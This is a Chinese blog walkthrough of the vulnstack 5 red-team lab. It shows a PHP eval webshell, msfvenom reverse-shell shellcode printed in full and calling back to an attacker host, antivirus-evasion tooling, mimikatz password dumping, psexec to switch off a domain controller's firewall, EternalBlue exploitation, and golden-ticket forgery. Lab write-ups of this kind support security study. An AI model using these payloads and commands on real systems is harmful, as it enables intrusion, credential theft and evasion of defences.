vulnstack(五)

最新推荐文章于 2024-05-13 11:31:23 发布
最新推荐文章于 2024-05-13 11:31:23 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/117390965
版权

1.信息收集

主机发现

sudo netdiscover eth0 -r 192.168.31.0/24

端口扫描

nmap -A 192.168.31.57 -p- -sV -oN nmap.a

goby漏扫

2.漏洞利用

goby 通用poc写webshell

echo ^<?php @eval($_POST['123']) ?^> >     #注意”>“字符需要转义
type shell.php

蚁剑连接webshell

3.内网渗透

webshell权限为sun\Administrator权限

MSFshellcode免杀马上传

使用掩日3.2进行加载shelcode,

掩日下载https://github.com/1y0n/AV_Evasion_Tool/releases/tag/3.1.2

kali@ToolsScannerKali20201:~$ msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=192.168.31.215 LPORT=1234 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] = 
"\xb8\x36\x2b\x17\x3d\xdb\xd2\xd9\x74\x24\xf4\x5d\x33\xc9\xb1"
"\x56\x31\x45\x13\x03\x45\x13\x83\xc5\x32\xc9\xe2\xc1\xd2\x8f"
"\x0d\x3a\x22\xf0\x84\xdf\x13\x30\xf2\x94\x03\x80\x70\xf8\xaf"
"\x6b\xd4\xe9\x24\x19\xf1\x1e\x8d\x94\x27\x10\x0e\x84\x14\x33"
"\x8c\xd7\x48\x93\xad\x17\x9d\xd2\xea\x4a\x6c\x86\xa3\x01\xc3"
"\x37\xc0\x5c\xd8\xbc\x9a\x71\x58\x20\x6a\x73\x49\xf7\xe1\x2a"
"\x49\xf9\x26\x47\xc0\xe1\x2b\x62\x9a\x9a\x9f\x18\x1d\x4b\xee"
"\xe1\xb2\xb2\xdf\x13\xca\xf3\xe7\xcb\xb9\x0d\x14\x71\xba\xc9"
"\x67\xad\x4f\xca\xcf\x26\xf7\x36\xee\xeb\x6e\xbc\xfc\x40\xe4"
"\x9a\xe0\x57\x29\x91\x1c\xd3\xcc\x76\x95\xa7\xea\x52\xfe\x7c"
"\x92\xc3\x5a\xd2\xab\x14\x05\x8b\x09\x5e\xab\xd8\x23\x3d\xa3"
"\x2d\x0e\xbe\x33\x3a\x19\xcd\x01\xe5\xb1\x59\x29\x6e\x1c\x9d"
"\x38\x78\x9f\x71\x82\xe9\x61\x72\xf2\x20\xa6\x26\xa2\x5a\x0f"
"\x47\x29\x9b\xb0\x92\xc7\x91\x26\xdd\xbf\xb9\x61\xb5\xbd\xc5"
"\x89\x94\x48\x23\xc1\x48\x1a\xfc\xa2\x38\xda\xac\x4a\x53\xd5"
"\x93\x6b\x5c\x3c\xbc\x06\xb3\xe8\x94\xbe\x2a\xb1\x6f\x5e\xb2"
"\x6c\x0a\x60\x38\x84\xea\x2f\xc9\xed\xf8\x58\xae\x0d\x01\x99"
"\x5b\x0d\x6b\x9d\xcd\x5a\x03\x9f\x28\xac\x8c\x60\x1f\xaf\xcb"
"\x9f\xde\x99\xa0\x96\x74\xa5\xde\xd6\x98\x25\x1f\x81\xf2\x25"
"\x77\x75\xa7\x76\x62\x7a\x72\xeb\x3f\xef\x7d\x5d\x93\xb8\x15"
"\x63\xca\x8f\xb9\x9c\x39\x8c\xbe\x62\xbf\xbb\x66\x0a\x3f\xfc"
"\x96\xca\x55\xfc\xc6\xa2\xa2\xd3\xe9\x02\x4a\xfe\xa1\x0a\xc1"
"\x6f\x03\xab\xd6\xa5\xc5\x75\xd6\x4a\xde\x86\xad\x23\xe1\x67"
"\x52\x2a\x86\x68\x52\x52\xb8\x55\x84\x6b\xce\x98\x14\xc8\xc1"
"\xaf\x39\x79\x48\xcf\x6e\x79\x59";

复制shellcode ctrl+v直接生成

MSF获取meterpreter

域内信息收集

路由信息

Local subnet: 192.168.31.0/255.255.255.0
Local subnet: 192.168.138.0/255.255.255.0

抓密码

进程注入获取SYSTEM权限

load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg

添加路由

扫描内网存活

Psexec命令关闭DC域控防火墙

use auxiliary/admin/smb/psexec_command 
set rhosts 192.168.138.138
set smbuser Administrator
set smbpass dc123.com
set COMMAND netsh advfirewall set allprofiles state off
run

永恒之蓝正向连接

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.138.138
set rport 445 
run

开启域控3389使用域管理员Administrator登录域控

开RDP

run post/windows/manage/enable_rdp

开sock4a并配置/etc/proxychains

4.权限维持

进程注入提取krbtgt信息

生成黄金票据

load kiwi
golden_ticket_create -d sun.com -u wxk -s S-1-5-21-3388020223-1982701712-4030140183 -k 65dc23a67f31503698981f2665f9d858 -t /tmp/krbtgt.ticket

载入票据查询域控

kerberos_ticket_use /tmp/krbtgt.ticket
dir \\DC\c$

 

火中的冰~
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
红日靶场vulnstack5)渗透分析
rysehsf的博客
10-25 148
上线cs,发现为heart用户,管理员权限,svc提权到system,抓取hash和明文,没有发现有用的域用户信息。这里配置的原因是让kali可以访问win7,win7访问不了kali,模拟win7外网的环境和kali内网的环境。将kali通过frp到vps端口,并生成免杀exe,蚁剑上传执行。这里dc不出网,fscan扫描到开启了445端口,直接smb上线。访问80页面发现一个thinkphp框架的首页,工具扫描RCE。开启socks代理,通过fscan扫描内网111网段。
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
【红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 1969
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
【红日靶场】vulnstack5-完整渗透过程_vulnhack
最新发布
2401_84972893的博客
05-13 734
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
vulnstack5靶场笔记
orange777
02-01 2400
红日靶场5
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 820
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1531
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
Skype安装程序
07-28
最新版Skype即时通讯工具。Skype即时通讯工具是国际上最流行的即时通讯工具,由俄罗斯人创造,现在被美国微软公司收购,已经替代了过去的MSN和ICQ,为当今世界最流行的语音通讯工具
红日安全ATT&CK靶机实战系列之vulnstack5
黑白的博客
04-25 4979
typora-root-url: pic 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet4,192.168.138.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直.
vulnstack内网靶场渗透测试
three_1996的博客
03-19 657
【代码】vulnstack内网靶场渗透测试。
VulnStack域环境靶场渗透(一)
qq_43590351的博客
09-20 1353
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 域成员server2003 192.168.52.141 域控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1097
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒之黑)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
Vulnstack1学习
ruyueattention
10-26 1115
文章目录前言一、环境搭建二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、环境搭建 一共三台机器,其中w7属于外网入口,w2003与windows server2008属于内网主机。因此为了实现环境需要为w7设置两张网卡,一张内网,一张外网。 w7 w2003 windows server
shellCode免杀技巧
qq_39330735的博客
05-15 2272
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
MSF之ms17-010永恒之蓝漏洞利用
极光时流
11-26 1万+
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali系统,其IP为:192.168.207.130 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole use auxiliary/scanner/smb/s...
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
ATT&CK 实战 - 红日安全 vulnstack(三)渗透记录
daxi0ng的博客
12-02 2669
1、大概拓扑用一下先知老哥这个图。我加了一个攻击机kail 192.168.1.128 https://xz.aliyun.com/t/6988 渗透过程: 话说我下载下来centos就是root权限登录状态。不过测试流程还是要的。 1、用msf测了一下版本 2、跑一下端口 3、跑一下目录,发现配置文件的备份文件 4、登陆一下数据库 5、查看一下密码,加密的,并且没有权限改密文。 6、joomla后台漏洞比较多的,所以想着添加一个管理员进后台。正好官方文档就有.
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1750
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
ATT&CK靶场系列(
qq_1873822的博客
12-05 3298
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com Win7双网卡模拟内外网 2008 sun\admin 2020.com 网络环境配置如下: 二、前期信息收集 使用nmap对外网ip段进行信息收集 nmap -A -v -T4 192.168.135.15
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值